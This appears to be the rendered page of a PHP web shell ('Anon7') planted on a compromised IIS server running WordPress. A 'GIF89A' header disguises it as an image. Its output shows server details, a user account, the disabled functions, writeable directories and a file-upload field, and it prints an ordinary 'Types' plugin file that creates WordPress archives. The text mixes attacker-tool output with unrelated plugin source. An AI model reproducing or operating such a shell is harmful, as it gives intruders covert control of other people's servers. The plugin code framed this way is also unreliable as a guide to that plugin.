GIF89A; .
KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Microsoft-IIS/10.0
System : Windows NT HMW9050 6.2 build 9200 (Unknow Windows version Standard Edition) i586
User : fatorc ( 0)
PHP Version : 5.3.28
Disable Function : escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell_exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, link, openlog, apache_child_terminate
Directory :  e:/home/fatorc/Web/wp-content/plugins/types/application/models/helper/create/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : e:/home/fatorc/Web/wp-content/plugins/types/application/models/helper/create/wordpress_archive.php
<?php

class Types_Helper_Create_Wordpress_Archive {

	/**
	 * Creates a WordPress Archive for a given post type
	 *
	 * @param $type
	 * @param bool|string $name Name for the WordPress Archive
	 *
	 * @return bool
	 * @since 2.0
	 */
	public function for_post( $type, $name = false ) {

		// check dependencies
		if( ! $this->needed_components_loaded() )
			return false;

		global $WPV_settings;
		$option = sanitize_text_field( sprintf( 'view_cpt_%s', $type ) );

		// for type 'post'
		if( $type == 'post' ) {
			$name = __( 'Archive for Home/Blog', 'types' );
			$option = 'view_home-blog-page';
		}

		// already has an archive
		if( isset( $WPV_settings[$option] ) && is_numeric( $WPV_settings[$option] ) && $WPV_settings[$option] > 0 )
			return $WPV_settings[$option];

		// set name if not given
		if( ! $name ) {
			$type_object = get_post_type_object( $type );
			$name = sprintf( __( 'Archive for %s', 'types' ), $type_object->labels->name );
		}

		$name = $this->validate_name( $name );

		if( ! $name )
			return false;

		$archive = WPV_WordPress_Archive::create( $name, array() );
		$archive_post = get_post( $archive->id );

		if( $archive_post === null )
			return false;

		$WPV_settings[$option] = $archive_post->ID;
		$WPV_settings->save();

		return $archive_post->ID;
	}

	/**
	 * Checks all dependencies
	 *
	 * @return bool
	 * @since 2.0
	 */
	private function needed_components_loaded( ) {
		global $WPV_settings;
		if(
			! is_object( $WPV_settings )
			|| ! class_exists( 'WPV_WordPress_Archive' )
			|| ! method_exists( 'WPV_WordPress_Archive', 'create' )
		) return false;

		return true;
	}

	/**
	 * Will proof if given name is already in use.
	 * If so it adds an running number until name is available
	 *
	 * @param $name
	 * @param int $id | should not manually added
	 *
	 * @return string
	 * @since 2.0
	 */
	private function validate_name( $name, $id = 1 ) {
		$name_exists = get_page_by_title( html_entity_decode( $name ), OBJECT, 'view' );

		if( $name_exists ) {
			$name = $id > 1 ? rtrim( rtrim( $name, $id - 1 ) ) : $name;
			return $this->validate_name( $name . ' ' . $id, $id + 1 );
		}

		return $name;
	}

}

Anon7 - 2021